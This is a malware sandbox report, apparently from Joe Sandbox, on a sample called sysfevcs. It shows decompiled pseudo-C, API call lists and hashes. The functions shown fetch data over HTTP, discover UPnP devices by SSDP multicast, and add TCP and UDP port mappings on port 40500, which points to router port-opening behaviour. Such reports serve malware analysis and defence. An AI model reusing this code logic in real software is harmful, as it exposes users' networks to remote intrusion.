                                                                                                                                                                                                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  															goto L34;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  														goto L34;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  													goto L34;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L34;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L34;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                  										if(_t118 == 0) {
                                                                                                                                                                                                                                                                  											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												_v40 = 0;
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L34;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L34;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L34;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L34;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L34;
                                                                                                                                                                                                                                                                  			}

















                                                                                                                                                                                                                                                                  0x00405646
                                                                                                                                                                                                                                                                  0x0040564d
                                                                                                                                                                                                                                                                  0x00405654
                                                                                                                                                                                                                                                                  0x0040565b
                                                                                                                                                                                                                                                                  0x00405662
                                                                                                                                                                                                                                                                  0x00405669
                                                                                                                                                                                                                                                                  0x00405670
                                                                                                                                                                                                                                                                  0x00405677
                                                                                                                                                                                                                                                                  0x00405681
                                                                                                                                                                                                                                                                  0x00405686
                                                                                                                                                                                                                                                                  0x00405689
                                                                                                                                                                                                                                                                  0x00405690
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040569a
                                                                                                                                                                                                                                                                  0x004056a3
                                                                                                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                                                                                                  0x004056b5
                                                                                                                                                                                                                                                                  0x004056be
                                                                                                                                                                                                                                                                  0x004056c6
                                                                                                                                                                                                                                                                  0x004056d0
                                                                                                                                                                                                                                                                  0x004056d9
                                                                                                                                                                                                                                                                  0x004056e1
                                                                                                                                                                                                                                                                  0x004056ef
                                                                                                                                                                                                                                                                  0x004056f9
                                                                                                                                                                                                                                                                  0x00405702
                                                                                                                                                                                                                                                                  0x0040570a
                                                                                                                                                                                                                                                                  0x00405714
                                                                                                                                                                                                                                                                  0x00405718
                                                                                                                                                                                                                                                                  0x00405721
                                                                                                                                                                                                                                                                  0x00405729
                                                                                                                                                                                                                                                                  0x004057b3
                                                                                                                                                                                                                                                                  0x004057b8
                                                                                                                                                                                                                                                                  0x004057bb
                                                                                                                                                                                                                                                                  0x004057c2
                                                                                                                                                                                                                                                                  0x004057cb
                                                                                                                                                                                                                                                                  0x004057d1
                                                                                                                                                                                                                                                                  0x004057d8
                                                                                                                                                                                                                                                                  0x004057df
                                                                                                                                                                                                                                                                  0x004057e8
                                                                                                                                                                                                                                                                  0x004057f0
                                                                                                                                                                                                                                                                  0x004057f7
                                                                                                                                                                                                                                                                  0x00405800
                                                                                                                                                                                                                                                                  0x00405808
                                                                                                                                                                                                                                                                  0x0040581a
                                                                                                                                                                                                                                                                  0x0040581e
                                                                                                                                                                                                                                                                  0x00405832
                                                                                                                                                                                                                                                                  0x00405834
                                                                                                                                                                                                                                                                  0x00405836
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040583c
                                                                                                                                                                                                                                                                  0x00405840
                                                                                                                                                                                                                                                                  0x00405846
                                                                                                                                                                                                                                                                  0x0040584b
                                                                                                                                                                                                                                                                  0x00405852
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405862
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405876
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x0040588a
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x0040589e
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x004058c5
                                                                                                                                                                                                                                                                  0x004058b4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004058c0
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405820
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040580a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057f2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057da
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057c4
                                                                                                                                                                                                                                                                  0x0040573b
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x0040574d
                                                                                                                                                                                                                                                                  0x00405792
                                                                                                                                                                                                                                                                  0x004057a2
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x00405766
                                                                                                                                                                                                                                                                  0x0040576a
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405782
                                                                                                                                                                                                                                                                  0x004057a4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040570c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056e3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056c8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056ad
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004055F0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00405610
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                  • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                  • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                  • Opcode ID: c7453d52693bc7b60de16940a77df03e7104cdf20df7428d156c1474af7c1dc8
                                                                                                                                                                                                                                                                  • Instruction ID: 63bbab498f99db53ba01a8136a03793a8b602ba9dec1d09a194da87260503e76
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7453d52693bc7b60de16940a77df03e7104cdf20df7428d156c1474af7c1dc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4391FB75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E515B73A0D739AE42CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                                                                                                                  			E0040C950(char* _a4) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                                                                                                                                  				void* _t88;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				void* _t90;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_t44 = E0040BF80(_a4,  &_v8);
                                                                                                                                                                                                                                                                  				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                  				_v12 = _t44;
                                                                                                                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                                                                                                                  					_t46 = E0040BD20(_v12);
                                                                                                                                                                                                                                                                  					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                  					_v20 = _t46;
                                                                                                                                                                                                                                                                  					if(_v20 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 0;
                                                                                                                                                                                                                                                                  						_push( &_v24);
                                                                                                                                                                                                                                                                  						_push(_v20);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_push( &_v28);
                                                                                                                                                                                                                                                                  							_push(_v24);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                  								_t59 = E0040C900(_v28);
                                                                                                                                                                                                                                                                  								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  								_v32 = _t59;
                                                                                                                                                                                                                                                                  								if(_v32 != 0) {
                                                                                                                                                                                                                                                                  									_t62 = E0040C7E0(_v28);
                                                                                                                                                                                                                                                                  									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  									_v36 = _t62;
                                                                                                                                                                                                                                                                  									if(_v36 != 0) {
                                                                                                                                                                                                                                                                  										E0040B100( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                  										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                  										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__imp__#6(_v32);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00408990(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v16;
                                                                                                                                                                                                                                                                  			}


















                                                                                                                                                                                                                                                                  0x0040c956
                                                                                                                                                                                                                                                                  0x0040c965
                                                                                                                                                                                                                                                                  0x0040c96a
                                                                                                                                                                                                                                                                  0x0040c96d
                                                                                                                                                                                                                                                                  0x0040c974
                                                                                                                                                                                                                                                                  0x0040c97e
                                                                                                                                                                                                                                                                  0x0040c983
                                                                                                                                                                                                                                                                  0x0040c986
                                                                                                                                                                                                                                                                  0x0040c98d
                                                                                                                                                                                                                                                                  0x0040c993
                                                                                                                                                                                                                                                                  0x0040c99d
                                                                                                                                                                                                                                                                  0x0040c9a6
                                                                                                                                                                                                                                                                  0x0040c9b1
                                                                                                                                                                                                                                                                  0x0040c9c1
                                                                                                                                                                                                                                                                  0x0040c9cb
                                                                                                                                                                                                                                                                  0x0040c9d4
                                                                                                                                                                                                                                                                  0x0040c9dc
                                                                                                                                                                                                                                                                  0x0040c9e8
                                                                                                                                                                                                                                                                  0x0040c9ed
                                                                                                                                                                                                                                                                  0x0040c9f0
                                                                                                                                                                                                                                                                  0x0040c9f7
                                                                                                                                                                                                                                                                  0x0040c9fd
                                                                                                                                                                                                                                                                  0x0040ca02
                                                                                                                                                                                                                                                                  0x0040ca05
                                                                                                                                                                                                                                                                  0x0040ca0c
                                                                                                                                                                                                                                                                  0x0040ca1f
                                                                                                                                                                                                                                                                  0x0040ca24
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca69
                                                                                                                                                                                                                                                                  0x0040ca6e
                                                                                                                                                                                                                                                                  0x0040ca77

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysAllocString.OLEAUT32(00000000), ref: 0040BD4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: CoCreateInstance.OLE32(0040F318,00000000,00004401,0040F308,00000000), ref: 0040BD76
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysFreeString.OLEAUT32(00000000), ref: 0040BE11
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                  • String ID: %S%S
                                                                                                                                                                                                                                                                  • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                  • Opcode ID: 2ae2762a012528179557cf2ef0acaad12bf3170ac0909533dffa7135a3e4dff9
                                                                                                                                                                                                                                                                  • Instruction ID: fa3ea7129126085e9455d64281f51dd4710db2dfe7809279c8c0483b4bb99b26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae2762a012528179557cf2ef0acaad12bf3170ac0909533dffa7135a3e4dff9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D741F8B5A00109DFCB04DBA4C885BAFB7B9AF48304F148669E505B7391D738AA45CFA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040CD40() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				char _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_t20 = E0040C2A0( &_v12,  &_v12);
                                                                                                                                                                                                                                                                  				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                  				_v8 = _t20;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_t20 = E0040C950( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                                                                                                                                                                                                  						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                  						 *0x4139dc = _t20;
                                                                                                                                                                                                                                                                  						if( *0x4139dc == 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v20 = E00409260();
                                                                                                                                                                                                                                                                  						E0040CCC0( *0x4139dc,  *0x4139dc, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t20 = E0040CCC0( *0x4139dc,  *0x4139dc, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                  						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return E00408AB0(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040cd4a
                                                                                                                                                                                                                                                                  0x0040cd50
                                                                                                                                                                                                                                                                  0x0040cd5b
                                                                                                                                                                                                                                                                  0x0040cd60
                                                                                                                                                                                                                                                                  0x0040cd63
                                                                                                                                                                                                                                                                  0x0040cd6a
                                                                                                                                                                                                                                                                  0x0040cd70
                                                                                                                                                                                                                                                                  0x0040cd82
                                                                                                                                                                                                                                                                  0x0040cd94
                                                                                                                                                                                                                                                                  0x0040cd99
                                                                                                                                                                                                                                                                  0x0040cd9c
                                                                                                                                                                                                                                                                  0x0040cda8
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cd7f
                                                                                                                                                                                                                                                                  0x0040cdaf
                                                                                                                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                                                                                                                  0x0040cde3
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cde8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cdfc
                                                                                                                                                                                                                                                                  0x0040ce02

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040624C), ref: 0040CD4A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C2A0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C950: SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID: TCP$UDP
                                                                                                                                                                                                                                                                  • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                  • Opcode ID: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction ID: 59801a5b79b9a69c2d6e15e1ff1d4abc1ee1c9ac4fca949444fada01e75ea631
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f1121c42ce1bd47f0727a7d7a1aa89d34a02686b05a0b2b7639617a1654c33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C611A5B5E00108EBDB00EFD4D886BAE7775AB44308F10867EE401772C2D6786A00CF49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 104 901490-901522 105 901530-90154c FileTimeToLocalFileTime FileTimeToSystemTime 104->105 106 901524-90152e GetLocalTime 104->106 107 901552-901579 GetTimeZoneInformation 105->107 106->107 108 901584-90158c 107->108 109 90157b-901581 107->109 110 901599-90159e 108->110 111 90158e-901597 108->111 109->108 112 9015a4-9015b4 110->112 111->112 113 9015b6-9015bb 112->113 114 9015bf-9015c5 112->114 113->114 115 9015d0-9015d7 114->115 116 9015c7-9015cc 114->116 117 9015e2-9015e6 115->117 118 9015d9-9015de 115->118 116->115 119 9015e8-9015ec 117->119 120 901659-90165d 117->120 118->117 121 9015fa 119->121 122 9015ee-9015f8 119->122 123 90166b 120->123 124 90165f-901669 120->124 125 901604-901657 wsprintfA 121->125 122->125 126 901675-9016ce wsprintfA 123->126 124->126 127 9016d1-9016d4 125->127 126->127
                                                                                                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                                                                                                  			E00901490(FILETIME* _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                                                                                                                  				intOrPtr _v84;
                                                                                                                                                                                                                                                                  				signed int _v88;
                                                                                                                                                                                                                                                                  				signed int _v92;
                                                                                                                                                                                                                                                                  				struct _SYSTEMTIME _v108;
                                                                                                                                                                                                                                                                  				struct _TIME_ZONE_INFORMATION _v284;
                                                                                                                                                                                                                                                                  				struct _FILETIME _v292;
                                                                                                                                                                                                                                                                  				signed int _v296;
                                                                                                                                                                                                                                                                  				intOrPtr _v300;
                                                                                                                                                                                                                                                                  				CHAR* _v304;
                                                                                                                                                                                                                                                                  				long _t105;
                                                                                                                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                                                                                                                  				void* _t164;
                                                                                                                                                                                                                                                                  				signed int _t170;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v84 = 0x90315c;
                                                                                                                                                                                                                                                                  				_v80 = 0x903160;
                                                                                                                                                                                                                                                                  				_v76 = 0x903164;
                                                                                                                                                                                                                                                                  				_v72 = 0x903168;
                                                                                                                                                                                                                                                                  				_v68 = 0x90316c;
                                                                                                                                                                                                                                                                  				_v64 = 0x903170;
                                                                                                                                                                                                                                                                  				_v60 = 0x903174;
                                                                                                                                                                                                                                                                  				_v56 = 0x903178;
                                                                                                                                                                                                                                                                  				_v52 = 0x90317c;
                                                                                                                                                                                                                                                                  				_v48 = 0x903180;
                                                                                                                                                                                                                                                                  				_v44 = 0x903184;
                                                                                                                                                                                                                                                                  				_v40 = 0x903188;
                                                                                                                                                                                                                                                                  				_v36 = 0x90318c;
                                                                                                                                                                                                                                                                  				_v32 = 0x903190;
                                                                                                                                                                                                                                                                  				_v28 = 0x903194;
                                                                                                                                                                                                                                                                  				_v24 = 0x903198;
                                                                                                                                                                                                                                                                  				_v20 = 0x90319c;
                                                                                                                                                                                                                                                                  				_v16 = 0x9031a0;
